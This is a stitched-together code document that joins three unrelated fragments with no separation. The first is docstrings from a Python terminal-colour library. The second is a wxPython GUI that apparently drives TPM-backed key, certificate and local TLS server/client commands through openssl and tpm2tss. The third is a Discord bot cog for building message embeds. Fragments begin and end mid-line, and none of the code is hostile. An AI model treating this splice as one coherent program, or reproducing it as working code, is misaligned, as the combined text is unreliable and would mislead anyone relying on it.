string-like object containing strike-through text, which is supported by very few terminals. Example usage:: from fabulous.color import strike print strike('i am stricken!') print plain('hello ', strike('world')) The ANSI escape codes are as follows:: >>> str(strike("hello")) '\x1b[9mhello\x1b[29m' """ fmt = esc(9) + "%s" + esc(29) class blink(ColorString): r"""Blinking text wrapper This class creates a string-like object containing blinking text. This is supported by SOME terminals, as documented in the terminal support section. 
Example usage:: from fabulous.color import blink print blink('i am underlined!') print plain('hello ', blink('world')) The ANSI escape codes are as follows:: >>> str(blink("hello")) '\x1b[5mhello\x1b[25m' """ fmt = esc(5) + "%s" + esc(25) class flip(ColorString): r"""Flips background and foreground colors For example:: from fabulous.color import flip, red print flip(red('hello')) Is equivalent to the following on a black terminal:: from fabulous.color import black, red_bg print red_bg(black('hello')) The ANSI escape codes are as follows:: >>> str(flip("hello")) '\x1b[7mhello\x1b[27m' """ fmt = esc(7) + "%s" + esc(27) class black(ColorString): r"""Black foreground text wrapper This class creates a string-like object containing text with a black foreground. Example usage:: from fabulous.color import black print black('i am black!') print plain('hello ', black('world')) Text can be made dark grey by using :class:`.bold`:: from fabulous.color import bold, black print bold(black('i am dark grey!')) The ANSI escape codes are as follows:: >>> str(black("hello")) '\x1b[30mhello\x1b[39m' """ fmt = esc(30) + "%s" + esc(39) class red(ColorString): r"""Red foreground text wrapper This class creates a string-like object containing text with a red foreground. Example usage:: from fabulous.color import red print red('i am red!') print plain('hello ', red('world')) Text can be made bright red by using :class:`.bold`:: from fabulous.color import bold, red print bold(red('i am bright red!')) The ANSI escape codes are as follows:: >>> str(red("hello")) '\x1b[31mhello\x1b[39m' """ fmt = esc(31) + "%s" + esc(39) class green(ColorString): r"""Green foreground text wrapper This class creates a string-like object containing text with a green foreground. 
Example usage:: from fabulous.color import green print green('i am green!') print plain('hello ', green('world')) Text can be made bright green by using :class:`.bold`:: from fabulous.color import bold, green print bold(green('i am bright green!')) The ANSI escape codes are as follows:: >>> str(green("hello")) '\x1b[32mhello\x1b[39m' """ fmt = esc(32) + "%s" + esc(39) class yellow(ColorString): r"""Yellow foreground text wrapper This class creates a string-like object containing text with a "yellow" foreground, which in many terminals is actually going to look more brownish. Example usage:: from fabulous.color import yellow print yellow('i am yellow brownish!') print plain('hello ', yellow('world')) Text can be made true bright yellow by using :class:`.bold`:: from fabulous.color import bold, yellow print bold(yellow('i am bright yellow!')) The ANSI escape codes are as follows:: >>> str(yellow("hello")) '\x1b[33mhello\x1b[39m' """ fmt = esc(33) + "%s" + esc(39) class blue(ColorString): r"""Blue foreground text wrapper This class creates a string-like object containing text with a blue foreground. Example usage:: from fabulous.color import blue print blue('i am dark blue!') print plain('hello ', blue('world')) Text can be made
-extensions v3_ca -out CA_rsa_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") def OnGenKeyPair1(self, evt): self.text_server.AppendText("Generating SERVER key-pair...\n") wx.CallLater(10, self.OnGenKeyPair) def OnGenKeyPair(self): if (exec_cmd.ownerAuth !=""): exec_cmd.execCLI([ "tpm2tss-genkey", "-o",exec_cmd.ownerAuth, "-a", "rsa", "rsa_server.tss", ]) self.text_server.AppendText("'tpm2tss-genkey -o %s -a rsa rsa_server.tss'\n" %exec_cmd.ownerAuth) else: exec_cmd.execCLI([ "tpm2tss-genkey", "-a", "rsa", "rsa_server.tss", ]) self.text_server.AppendText("Generating SERVER key-pair: 'tpm2tss-genkey -a rsa rsa_server.tss'\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") def OnGenCSR1(self, evt): self.text_server.AppendText("Creating Certificate Signing Request...\n") wx.CallLater(10, self.OnGenCSR) def OnGenCSR(self): if (exec_cmd.ownerAuth !=""): f = open("temp.conf", "w+") f.write(exec_cmd.openssl_cnf) f.close() #~ self.text_server.AppendText("Creating Certificate Signing Request:\n") command_output = exec_cmd.execCLI([ "openssl", "req", "-new", "-config","temp.conf", "-engine", "tpm2tss", "-key", "rsa_server.tss", "-keyform", "engine", "-subj", "/CN=TPM_UI/O=Infineon/C=SG", "-out", "server_rsa.csr", ]) self.text_server.AppendText(str(command_output)) self.text_server.AppendText("openssl req -new -config temp.conf -engine tpm2tss -key rsa_server.tss -keyform engine -subj /CN=TPM_UI/O=Infineon/C=SG -out server_rsa.csr\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") else: command_output = exec_cmd.execCLI([ "openssl", "req", "-new", "-engine", "tpm2tss", "-key", "rsa_server.tss", "-keyform", "engine", "-subj", "/CN=TPM_UI/O=Infineon/C=SG", "-out", "server_rsa.csr", ]) self.text_server.AppendText(str(command_output)) self.text_server.AppendText("openssl req -new -engine 
tpm2tss -key rsa_server.tss -keyform engine -subj /CN=TPM_UI/O=Infineon/C=SG -out server_rsa.csr\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") def OnGenCert(self, evt): self.text_server.AppendText("Creating Server Certificate...\n") if (exec_cmd.ownerAuth !=""): f = open("temp.conf", "w+") f.write(exec_cmd.openssl_cnf) f.close() openssl_cmd="OPENSSL_CONF=temp.conf openssl x509 -req -in server_rsa.csr -CA CA_rsa_cert.pem -CAkey rsa_CA.tss -engine tpm2tss -CAkeyform engine -out CAsigned_rsa_cert.crt -days 365 -sha256 -CAcreateserial" server_proc = exec_cmd.createProcess(openssl_cmd, server_log) #~ command_output = exec_cmd.execCLI([ #~ "OPENSSL_CONF=temp.conf", "openssl", "x509", #~ "-req", "-in", "server_rsa.csr", #~ "-CA","CA_rsa_cert.pem", #~ "-CAkey", "rsa_CA.tss", "-engine tpm2tss", #~ "-CAkeyform", "engine", #~ "-out", "CAsigned_rsa_cert.crt", #~ "-days", "365", "-sha256", "-CAcreateserial", #~ ]) #~ self.text_server.AppendText(str(command_output)) self.text_server.AppendText("OPENSSL_CONF=temp.conf openssl x509 -req -in server_rsa.csr -CA CA_rsa_cert.pem -CAkey rsa_CA.tss -engine tpm2tss -CAkeyform engine -out CAsigned_rsa_cert.crt -days 365 -sha256 -CAcreateserial\n") else: command_output = exec_cmd.execCLI([ "openssl", "req", "-x509", "-sha256", "-engine", "tpm2tss", "-key", "rsa_CA.tss", "-keyform", "engine", "-in", "server_rsa.csr", "-out", "CAsigned_rsa_cert.crt", ]) self.text_server.AppendText(str(command_output)) self.text_server.AppendText("openssl req -x509 -sha256 -key rsa_CA.tss -engine tpm2tss -keyform engine -in server_rsa.csr -out CAsigned_rsa_cert.crt\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") def OnStartServer(self, evt): global server_proc,client_proc,server_log global server_thread global RSA_Server_thread_active_flag,RSA_Client_thread_active_flag if (server_proc is not None): RSA_Server_thread_active_flag=0 if (client_proc is not None): RSA_Client_thread_active_flag=0 
print("Client Thread Active..killing it: %d \n" % client_proc.pid) kill_child_processes(client_proc.pid) client_proc.terminate() client_proc.wait() client_proc = None print("Server Thread Active..killing it: %d \n" % server_proc.pid) kill_child_processes(server_proc.pid) #server_proc.stdin.write("stop\n") #server_thread.raise_exception() #server_thread.join() server_proc.terminate() server_proc.wait() server_proc = None else: #server_proc = exec_cmd.createProcess("lxterminal --title=Server --geometry=55x24 --command='openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss'", server_log) if (exec_cmd.ownerAuth !=""): openssl_cmd="OPENSSL_CONF=temp.conf openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss" else: openssl_cmd="openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss" server_proc = exec_cmd.createProcess(openssl_cmd, server_log) server_thread = RSA_Server_Thread(1, server_proc) server_thread.start() wx.CallAfter(Publisher.sendMessage, "Server_Text", msg="\n\n" + openssl_cmd +"\n\n") def OnStartClient(self, evt): global client_proc,client_log,server_proc global RSA_Client_thread_active_flag,RSA_Server_thread_active_flag if (client_proc is not None): RSA_Client_thread_active_flag=0 print("Client Thread Active..killing it: %d \n" % client_proc.pid) kill_child_processes(client_proc.pid) client_proc.terminate() client_proc.wait() client_proc = None else: #client_proc = exec_cmd.createProcess("lxterminal --title=Server --geometry=55x24 --command='openssl s_server -cert CAsigned_rsa_cert.crt -accept 4433 -keyform engine -engine tpm2tss -key rsa_server.tss'", server_log) openssl_cmd="openssl s_client -connect localhost:4433 -tls1_2 -CAfile CA_rsa_cert.pem" if (server_proc is not None): client_proc = exec_cmd.createProcess(openssl_cmd, client_log) client_thread = RSA_Client_Thread(2, client_proc) 
client_thread.start() wx.CallAfter(Publisher.sendMessage, "Client_Text", msg="\n\n" +openssl_cmd+"\n\n") else: wx.CallAfter(Publisher.sendMessage, "Client_Text", msg="Server is not active..\n") def OnWriteServer(self, evt): global server_proc if (server_proc is None): self.text_server.AppendText("Server is not running!\n") return write_value = self.input_server.GetValue() if (write_value == ""): self.text_server.AppendText("I need something to write!\n") return server_proc.stdin.write((write_value+"\n").encode()) server_proc.stdin.flush() def OnWriteClient(self, evt): global client_proc if (client_proc is None): self.text_client.AppendText("Client is not running!\n") return write_value = self.input_client.GetValue() if (write_value == ""): self.text_client.AppendText("I need something to write!\n") return client_proc.stdin.write((write_value+"\n").encode()) client_proc.stdin.flush() class Tab_ECC_CS(wx.Panel): def __init__(self, parent): wx.Panel.__init__(self, parent) # declare the sizers mainsizer = wx.BoxSizer(wx.HORIZONTAL) steps_sizer = wx.BoxSizer(wx.VERTICAL) server_sizer = wx.BoxSizer(wx.VERTICAL) client_sizer = wx.BoxSizer(wx.VERTICAL) # instantiate the objects button_gen_ca = wx.Button(self, -1, 'Generate CA && CA Cert', size = (-1, 48)) button_gen_keypair = wx.Button(self, -1, 'Create Keypair (for server)', size = (-1, 48)) button_gen_csr = wx.Button(self, -1, 'Create CSR', size = (-1, 48)) button_gen_cert = wx.Button(self, -1, 'Create Server Cert', size = (-1, 48)) button_start_server = wx.Button(self, -1, 'Start/Stop Server') button_start_client = wx.Button(self, -1, 'Start/Stop Client') button_write_from_server = wx.Button(self, -1, 'Write to Client') button_write_from_client = wx.Button(self, -1, 'Write to Server') button_flush_client = wx.Button(self, -1, 'Clear client text', size = (-1, 48)) button_flush_server = wx.Button(self, -1, 'Clear server text', size = (-1, 48)) self.text_client = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | 
wx.TE_READONLY)) self.text_server = wx.TextCtrl(self, -1, style=(wx.TE_MULTILINE | wx.TE_READONLY)) self.text_client.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)) self.text_server.SetFont(wx.Font(12, wx.FONTFAMILY_TELETYPE, wx.FONTSTYLE_NORMAL, wx.FONTWEIGHT_NORMAL)) self.input_client = wx.TextCtrl(self, -1,value="Send from Client") self.input_server = wx.TextCtrl(self, -1,value="Send from Server") backimage = wx.Image('../images/back.png', wx.BITMAP_TYPE_PNG).ConvertToBitmap() backbutton = wx.BitmapButton(self, -1, backimage) # ~backbutton = wx.BitmapButton(self, -1, img.back.getBitmap()) # attach the objects to the sizers mainsizer.Add(steps_sizer, 0, wx.EXPAND | wx.LEFT | wx.TOP | wx.BOTTOM, 5) mainsizer.Add(server_sizer, 1, wx.EXPAND | wx.RIGHT | wx.TOP | wx.BOTTOM, 5) mainsizer.Add(client_sizer, 1, wx.EXPAND | wx.RIGHT | wx.TOP | wx.BOTTOM, 5) steps_sizer.Add(button_gen_ca, 0, wx.EXPAND | wx.ALL, 5) steps_sizer.Add(button_gen_keypair, 0, wx.EXPAND | wx.ALL, 5) steps_sizer.Add(button_gen_csr, 0, wx.EXPAND | wx.ALL, 5) steps_sizer.Add(button_gen_cert, 0, wx.EXPAND | wx.ALL, 5) steps_sizer.Add(button_flush_server, 0, wx.EXPAND | wx.ALL, 5) steps_sizer.Add(button_flush_client, 0, wx.EXPAND | wx.ALL, 5) steps_sizer.AddSpacer(236) steps_sizer.Add(backbutton, 0, wx.ALL, 5) server_sizer.Add(self.text_server, 1, wx.EXPAND | wx.ALL, 5) server_sizer.Add(button_start_server, 0, wx.EXPAND | wx.ALL, 5) server_sizer.Add(self.input_server, 0, wx.EXPAND | wx.ALL, 5) server_sizer.Add(button_write_from_server, 0, wx.EXPAND | wx.ALL, 5) client_sizer.Add(self.text_client, 1, wx.EXPAND | wx.ALL, 5) client_sizer.Add(button_start_client, 0, wx.EXPAND | wx.ALL, 5) client_sizer.Add(self.input_client, 0, wx.EXPAND | wx.ALL, 5) client_sizer.Add(button_write_from_client, 0, wx.EXPAND | wx.ALL, 5) # Set tooltips button_gen_ca.SetToolTip(wx.ToolTip("Generate Key Pair and Self-Signed Certificate for the Certificate Authority (CA).")) 
button_gen_keypair.SetToolTip(wx.ToolTip("Generate Key Pair for the Server.")) button_gen_csr.SetToolTip(wx.ToolTip("Generate Certificate Signing Request (CSR) for the CA, from the Server's private key.")) button_gen_cert.SetToolTip(wx.ToolTip("Generate Server Certificate from the CSR and the CA's private key.")) # declare and bind events self.Bind(wx.EVT_BUTTON, self.OnFlushClient, button_flush_client) self.Bind(wx.EVT_BUTTON, self.OnFlushServer, button_flush_server) self.Bind(wx.EVT_BUTTON, self.OnGenCA1, button_gen_ca) self.Bind(wx.EVT_BUTTON, self.OnGenKeyPair1, button_gen_keypair) self.Bind(wx.EVT_BUTTON, self.OnGenCSR1, button_gen_csr) self.Bind(wx.EVT_BUTTON, self.OnGenCert, button_gen_cert) self.Bind(wx.EVT_BUTTON, self.OnStartServer, button_start_server) self.Bind(wx.EVT_BUTTON, self.OnStartClient, button_start_client) self.Bind(wx.EVT_BUTTON, self.OnWriteServer, button_write_from_server) self.Bind(wx.EVT_BUTTON, self.OnWriteClient, button_write_from_client) self.Bind(wx.EVT_BUTTON, self.OnBack, backbutton) # Setup Publisher for text field update Publisher.subscribe(self.Upd_Server_Status, "ECC_Server_Text") Publisher.subscribe(self.Upd_Client_Status, "ECC_Client_Text") self.SetSizer(mainsizer) # declare threads related parameters self.Server_thread_active_flag=0 self.Client_thread_active_flag=0 self.server_proc=None self.client_proc=None def server_thread(self): try: while self.Server_thread_active_flag==1 : line = self.server_proc.stdout.readline() if line != '': wx.CallAfter(Publisher.sendMessage, "ECC_Server_Text", msg=line) finally: self.Server_thread_active_flag=0 print("Exit ECC server Thread\n") wx.CallAfter(Publisher.sendMessage, "ECC_Server_Text", msg="Server Stopped..\n") def client_thread(self): while self.Client_thread_active_flag==1 : line = self.client_proc.stdout.readline() if line != '': wx.CallAfter(Publisher.sendMessage, "ECC_Client_Text", msg=line) self.Client_thread_active_flag=0 print("Exit ECC client Thread\n") 
wx.CallAfter(Publisher.sendMessage, "ECC_Client_Text", msg="Client Stopped..\n") def Upd_Server_Status(self,msg): self.text_server.AppendText(msg) def Upd_Client_Status(self,msg): self.text_client.AppendText(msg) def OnBack(self, evt): #~ if (self.server_proc is not None): #~ self.Server_thread_active_flag=0 #~ if (self.client_proc is not None): #~ self.Client_thread_active_flag=0 #~ print "Client Thread Active..killing it: %d \n" % self.client_proc.pid #~ kill_child_processes(self.client_proc.pid) #~ self.client_proc.terminate() #~ self.client_proc.wait() #~ self.client_proc = None #~ print "Server Thread Active..killing it: %d \n" % self.server_proc.pid #~ kill_child_processes(self.server_proc.pid) #~ self.server_proc.terminate() #~ self.server_proc.wait() #~ self.server_proc = None self.Parent.Parent.OnCloseWindow(None) def Destroy(self): if (self.server_proc is not None): self.Server_thread_active_flag=0 if (self.client_proc is not None): self.Client_thread_active_flag=0 print("Client Thread Active..killing it: %d \n" % self.client_proc.pid) kill_child_processes(self.client_proc.pid) self.client_proc.terminate() self.client_proc.wait() self.client_proc = None print("Server Thread Active..killing it: %d \n" % self.server_proc.pid) kill_child_processes(self.server_proc.pid) self.server_proc.terminate() self.server_proc.wait() self.server_proc = None def OnFlushClient(self, evt): self.text_client.Clear() def OnFlushServer(self, evt): self.text_server.Clear() def OnGenCA1(self, evt): self.text_server.AppendText("Generating CA key-pair...\n") wx.CallLater(10, self.OnGenCA) def OnGenCA(self): exec_cmd.execCLI(["rm", "ecc_CA.tss", ]) exec_cmd.execCLI(["rm", "CA_ecc_cert.pem", ]) exec_cmd.execCLI(["rm", "ecc_server.tss", ]) exec_cmd.execCLI(["rm", "server_ecc.csr", ]) exec_cmd.execCLI(["rm", "CAsigned_ecc_cert.crt", ]) if (exec_cmd.ownerAuth !=""): f = open("temp.conf", "w+") f.write(exec_cmd.openssl_cnf) f.close() exec_cmd.execCLI([ "tpm2tss-genkey", "-a", "ecdsa", 
"-o",exec_cmd.ownerAuth, "ecc_CA.tss", ]) self.text_server.AppendText("'tpm2tss-genkey -a ecdsa -o %s ecc_CA.tss'\n" % exec_cmd.ownerAuth) self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") self.text_server.AppendText("Creating Self-Signed Certificate:\n") command_output = exec_cmd.execCLI([ "openssl", "req", "-new", "-config","temp.conf", "-engine", "tpm2tss", "-key", "ecc_CA.tss", "-keyform", "engine", "-x509", "-sha256", "-days", "7300", #~ "-extensions", "v3_ca", "-subj", "/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA", "-out", "CA_ecc_cert.pem", ]) self.text_server.AppendText(str(command_output)) self.text_server.AppendText("openssl req -config temp.conf -key ecc_CA.tss -new -x509 -days 7300 -sha256 -engine tpm2tss -keyform engine -extensions v3_ca -out CA_ecc_cert.pem -subj '/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA'\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") else: exec_cmd.execCLI([ "tpm2tss-genkey", "-a", "ecdsa", "ecc_CA.tss", ]) self.text_server.AppendText("Generating CA key-pair: 'tpm2tss-genkey -a ecdsa ecc_CA.tss'\n") self.text_server.AppendText("++++++++++++++++++++++++++++++++++++++++++++\n") self.text_server.AppendText("Creating Self-Signed Certificate:\n") command_output = exec_cmd.execCLI([ "openssl", "req", "-new", "-engine", "tpm2tss", "-key", "ecc_CA.tss", "-keyform", "engine", "-x509", "-sha256", "-days", "7300", #~ "-extensions", "v3_ca", "-subj", "/C=SG/ST=Singapore/L=Singapore/O=Infineon Technologies/OU=DSS/CN=TPMEvalKitCA", "-out", "CA_ecc_cert.pem",
import json
import textwrap
import typing as t
from collections import defaultdict
from contextlib import suppress

from discord import Color, Embed, Member, TextChannel, Forbidden
from discord.errors import HTTPException
from discord.ext.commands import Cog, ColourConverter, Context, group

from bot.core.bot import Bot
from bot.core.converters import Unicode


class EmbedData(t.NamedTuple):
    """Data for user embeds."""

    # content: plain message text sent alongside the embed
    # embed: the discord Embed object being built
    content: str
    embed: Embed


class JsonEmbedParser:
    """This class is used for converting json into embed and vice versa."""

    def __init__(self, ctx: Context, json_dict: dict) -> None:
        # Normalize the raw dict (fill defaults, strip unsupported keys)
        # before storing it; see process_dict.
        self.ctx = ctx
        self.json = JsonEmbedParser.process_dict(json_dict)

    @classmethod
    async def from_str(cls: "JsonEmbedParser", ctx: Context, json_string: str) -> t.Union["JsonEmbedParser", bool]:
        """Return class instance from json string.

        This will return either class instance (on correct json string),
        or False on incorrect json string.
        """
        json_dict = await cls.parse_json(ctx, json_string)
        # parse_json reports the error to the user itself; we only
        # propagate the failure marker.
        if json_dict is False:
            return False
        return cls(ctx, json_dict)

    @classmethod
    def from_embed(cls: "JsonEmbedParser", ctx: Context, embed: t.Union[Embed, EmbedData]) -> "JsonEmbedParser":
        """Return class instance from embed."""
        if isinstance(embed, EmbedData):
            embed_dict = embed.embed.to_dict()
            json_dict = {"content": embed.content, "embed": embed_dict}
        else:
            # Assumed to be a discord.Embed here (has .to_dict()).
            json_dict = embed.to_dict()
        return cls(ctx, json_dict)

    @staticmethod
    async def parse_json(ctx: Context, json_code: str) -> t.Union[dict, bool]:
        """Parse given json code."""
        # Sanitize code (remove codeblocks if any)
        if "```" in json_code:
            json_code = json_code.replace("```json\n", "")
            json_code = json_code.replace("```\n", "")
            json_code = json_code.replace("```json", "")
            json_code = json_code.replace("```", "")
        # Parse the code into JSON
        try:
            return json.loads(json_code)
        except json.JSONDecodeError as error:
            # Point the user at the offending line/column reported by
            # JSONDecodeError (lineno/colno are 1-based).
            lines = json_code.split("\n")
            embed = Embed(
                description=textwrap.dedent(
                    f"""
                    Sorry, I couldn't parse this JSON:
                    ```
                    {error}
                    ```
                    The error seems to be here *(`line: {error.lineno} col: {error.colno}`)*:
                    ```
                    {lines[error.lineno - 1]}
                    {" " * (int(error.colno) - 1)}^
                    ```
                    """
                ),
                color=Color.red(),
            )
            await ctx.send(f"Sorry {ctx.author.mention}", embed=embed)
            return False

    @staticmethod
    def process_dict(json_dct: dict) -> dict:
        """Set all values to Embed.Empty to avoid keyerrors."""
        # Accept both the wrapped form {"content": ..., "embed": {...}}
        # and a bare embed dict.
        try:
            content = json_dct["content"]
        except KeyError:
            content = ""
        try:
            new_json = json_dct["embed"]
        except KeyError:
            new_json = json_dct
        # Set default type to "rich"
        if "type" not in new_json:
            new_json["type"] = "rich"
        # TODO: Correctly implement timestampts
        # Current override will cause errors in make_json
        if "timestamp" in new_json:
            new_json["timestamp"] = Embed.Empty
        return {"content": content, "embed": new_json}

    def make_embed(self) -> EmbedData:
        """Produce an embed from the processed json."""
        embed = Embed.from_dict(self.json["embed"])
        return EmbedData(self.json["content"], embed)

    def make_json(self) -> str:
        """Make it json."""
        return json.dumps(self.json, indent=2)


class Embeds(Cog):
    """A Cog which provides the ability to build a custom embed."""

    def __init__(self, bot: Bot) -> None:
        self.bot = bot
        # Provide an empty embed for every member (key)
        self.embeds = defaultdict(lambda: EmbedData("", Embed()))
        # Provide a default ID of -1 for every member (key) for embed fields
        # setting it to -1 is necessary because adding embed only increments this
        # default value of -1 ensures start on 0
        self.embed_fields = defaultdict(lambda: -1)

    @group(invoke_without_command=True, name="embed", aliases=["embedset", "set_embed"])
    async def embed_group(self, ctx: Context) -> None:
        """Commands for configuring the Embed messages."""
        await ctx.send("This command is not meant to be used on its own!")

    # region: basic embed settings (title, description, footer, image, color, message)

    @embed_group.command(aliases=["set_title"])
    async def title(self, ctx: Context, *, title: Unicode) -> None:
        """Set Title for the Embed."""
        self.embeds[ctx.author].embed.title = title
        await ctx.send("Embeds title updated.")

    @embed_group.command(aliases=["set_description"], name="description")
    async def _description(self, ctx: Context, *, description: Unicode) -> None:
        """Set Description for the Embed."""
        self.embeds[ctx.author].embed.description = description
        await ctx.send("Embeds description updated.")

    @embed_group.command(aliases=["add_description"])
    async def append_description(self, ctx: Context, *, description: Unicode) -> None:
        """Add text into Description of the Embed."""
        # NOTE(review): if no description has been set yet, += on the
        # default (Embed.Empty) presumably raises — confirm and guard if so.
        self.embeds[ctx.author].embed.description += description
        await ctx.send("Embeds description appended.")

    @embed_group.command(aliases=["set_footer"])
    async def footer(self, ctx: Context, *, footer: Unicode) -> None:
        """Set Footer for the Embed."""
        self.embeds[ctx.author].embed.set_footer(text=footer)
        await ctx.send("Embeds footer updated.")

    @embed_group.command(aliases=["set_image"])
    async def image(self, ctx: Context, url: str) -> None:
        """Set image for the Embed."""
        self.embeds[ctx.author].embed.set_image(url=url)
        await ctx.send("Embeds image updated.")

    @embed_group.command(aliases=["set_color"])
    async def color(self, ctx: Context, color: ColourConverter) -> None:
        """Set color for the Embed.

        `color` can be HEX color code or some of the standard colors (red, blue, ...).
        """
        self.embeds[ctx.author].embed.colour = color
        await ctx.send("Embeds color updated.")

    @embed_group.command(aliases=["content", "msg"])
    async def message(self, ctx: Context, *, message: str) -> None:
        """Set message content for the Embed."""
        # EmbedData is an (immutable) NamedTuple, so replace the whole
        # entry while keeping the existing embed.
        self.embeds[ctx.author] = EmbedData(message, self.embeds[ctx.author].embed)
        await ctx.send("Message content updated.")

    # endregion
    # region: author settings

    @embed_group.group(invoke_without_command=True, name="author", aliases=["authorset", "set_author"])
    async def author_group(self, ctx: Context) -> None:
        """Commands for configuring the author of Embed messages."""
        await ctx.send("This command is not meant to be used on its own!")

    @author_group.command(name="name", aliases=["set_name"])
    async def author_name(self, ctx: Context, *, author_name: str) -> None:
        """Set author's name for the Embed."""
        # set_author replaces all author attributes, so re-pass the
        # previously stored url/icon to keep them.
        embed = self.embeds[ctx.author].embed
        embed.set_author(name=author_name, url=embed.author.url, icon_url=embed.author.icon_url)
        await ctx.send("Embeds author updated.")

    @author_group.command(name="url", aliases=["set_url"])
    async def author_url(self, ctx: Context, author_url: str) -> None:
        """Set author's URL for Embed."""
        embed = self.embeds[ctx.author].embed
        embed.set_author(name=embed.author.name, url=author_url, icon_url=embed.author.icon_url)
        await ctx.send("Embeds author URL updated.")

    @author_group.command(name="icon", aliases=["set_icon"])
    async def author_icon(self, ctx: Context, author_icon: t.Union[Member, str]) -> None:
        """Set author's icon in the Embed.

        `author_icon` can either be URL to the image or you can mention a user to get his avatar
        """
        if isinstance(author_icon, Member):
            author_icon = author_icon.avatar_url_as(format="png")
        embed = self.embeds[ctx.author].embed
        embed.set_author(name=embed.author.name, url=embed.author.url, icon_url=author_icon)
        await ctx.send("Embeds author icon updated.")

    # endregion
    # region: field settings

    @embed_group.group(invoke_without_command=True, name="field", aliases=["filedset", "set_field"])
    async def field_group(self, ctx: Context) -> None:
        """Group for field-related actions."""
        await ctx.send("This command is not meant to be used on its own!")

    @field_group.command(name="add")
    async def field_add(self, ctx: Context, *, title: t.Optional[Unicode] = None) -> None:
        """Create new field in Embed."""
        self.embeds[ctx.author].embed.add_field(name=title, value="")
        # Keep the per-author field counter in sync (IDs are 0-based).
        self.embed_fields[ctx.author] += 1
        await ctx.send(f"Embeds field **#{self.embed_fields[ctx.author]}** created")

    @field_group.command(name="remove", aliases=["delete", "rem", "del"])
    async def field_remove(self, ctx: Context, ID: int) -> None:
        """Remove field with specific `ID` from Embed."""
        if 0 <= ID <= self.embed_fields[ctx.author]:
            self.embeds[ctx.author].embed.remove_field(ID)
            self.embed_fields[ctx.author] -= 1
            await ctx.send(f"Embeds field **#{ID}** has been removed.")
        else:
            await ctx.send(f"Embeds field **#{ID}** doesn't exist.")

    @field_group.command(name="description", aliases=["set_description", "value", "set_value"])
    async def field_description(self, ctx: Context, ID: int, *, description: Unicode) -> None:
        """Set a description for embeds field #`ID`."""
        if 0 <= ID <= self.embed_fields[ctx.author]:
            # set_field_at replaces the whole field, so keep name/inline.
            embed = self.embeds[ctx.author].embed
            embed.set_field_at(
                ID, name=embed.fields[ID].name, value=description, inline=embed.fields[ID].inline
            )
            await ctx.send(f"Embeds field **#{ID}** description updated.")
        else:
            await ctx.send(f"Embeds field **#{ID}** doesn't exist.")

    @field_group.command(name="append_description", aliases=["add_description", "add_value"])
    async def field_append_description(self, ctx: Context, ID: int, *, description: Unicode) -> None:
        """Set a description for embeds field #`ID`."""
        if 0 <= ID <= self.embed_fields[ctx.author]:
            embed = self.embeds[ctx.author].embed
            embed.set_field_at(
                ID, name=embed.fields[ID].name, value=embed.fields[ID].value + description, inline=embed.fields[ID].inline
            )
            await ctx.send(f"Embeds field **#{ID}** description appended.")
        else:
            await ctx.send(f"Embeds field **#{ID}** doesn't exist.")

    @field_group.command(name="title", aliases=["set_title", "name", "set_name"])
    async def field_title(self, ctx: Context, ID: int, *, title: Unicode) -> None:
        """Set a title for embeds field #`ID`."""
        if 0 <= ID <= self.embed_fields[ctx.author]:
            embed = self.embeds[ctx.author].embed
            embed.set_field_at(
                ID, name=title, value=embed.fields[ID].value, inline=embed.fields[ID].inline
            )
            await ctx.send(f"Embeds field **#{ID}** description updated.")
        else:
            await ctx.send(f"Embeds field **#{ID}** doesn't exist.")

    @field_group.command(name="inline", aliases=["set_inline", "in_line", "set_in_line"])
    async def field_inline(self, ctx: Context, ID: int, inline_status: bool) -> None:
        """Choose if embed field #`ID` should be inline or not"""
        if 0 <= ID <= self.embed_fields[ctx.author]:
            embed = self.embeds[ctx.author].embed
            embed.set_field_at(
                ID, name=embed.fields[ID].name, value=embed.fields[ID].value, inline=inline_status
            )
            await ctx.send(f"Embeds field **#{ID}** is now {'' if inline_status else 'not'} inline")
        else:
            await ctx.send(f"Embeds field **#{ID}** doesn't exist.")

    # endregion
    # region: json

    @embed_group.command(aliases=["json_load", "from_json", "json", "import"])
    async def load(self, ctx: Context, *, json_code: str) -> None:
        """Generate Embed from given JSON code."""
        embed_parser = await JsonEmbedParser.from_str(ctx, json_code)
        if embed_parser is not False:
            # NOTE(review): self.embed_fields is not updated here, so the
            # field commands' ID bookkeeping can disagree with fields that
            # arrived via JSON — verify against the field commands above.
            self.embeds[ctx.author] = embed_parser.make_embed()
            await ctx.send("Embed updated accordingly to provided JSON")
        else:
            await ctx.send("Invalid embed JSON")

    @embed_group.command(aliases=["json_dump", "to_json", "get_json", "export"])
    async def dump(self, ctx: Context) -> None:
        """Export JSON from current Embed."""
        embed_parser = JsonEmbedParser.from_embed(ctx, self.embeds[ctx.author])
        # NOTE(review): this local deliberately-or-not shadows the imported
        # `json` module within this method.
        json = embed_parser.make_json()
        await ctx.send(f"```json\n{json}```")

    @embed_group.command()
    async def message_dump(self, ctx: Context, channel: TextChannel, message_id: int) -> None:
        """Dump an embed with it's ID."""
        # NOTE(review): `channel.server` and `bot.get_message(channel, id)`
        # match the pre-1.0 discord.py API — confirm against the installed
        # discord.py version (modern releases use `channel.guild` and
        # `channel.fetch_message`).
        member = channel.server and channel.server.get_member(ctx.message.author.id)
        if channel != ctx.message.channel and not member:
            await ctx.send("Private Channel, or Invalid Server.")
            return
        with suppress(Forbidden):
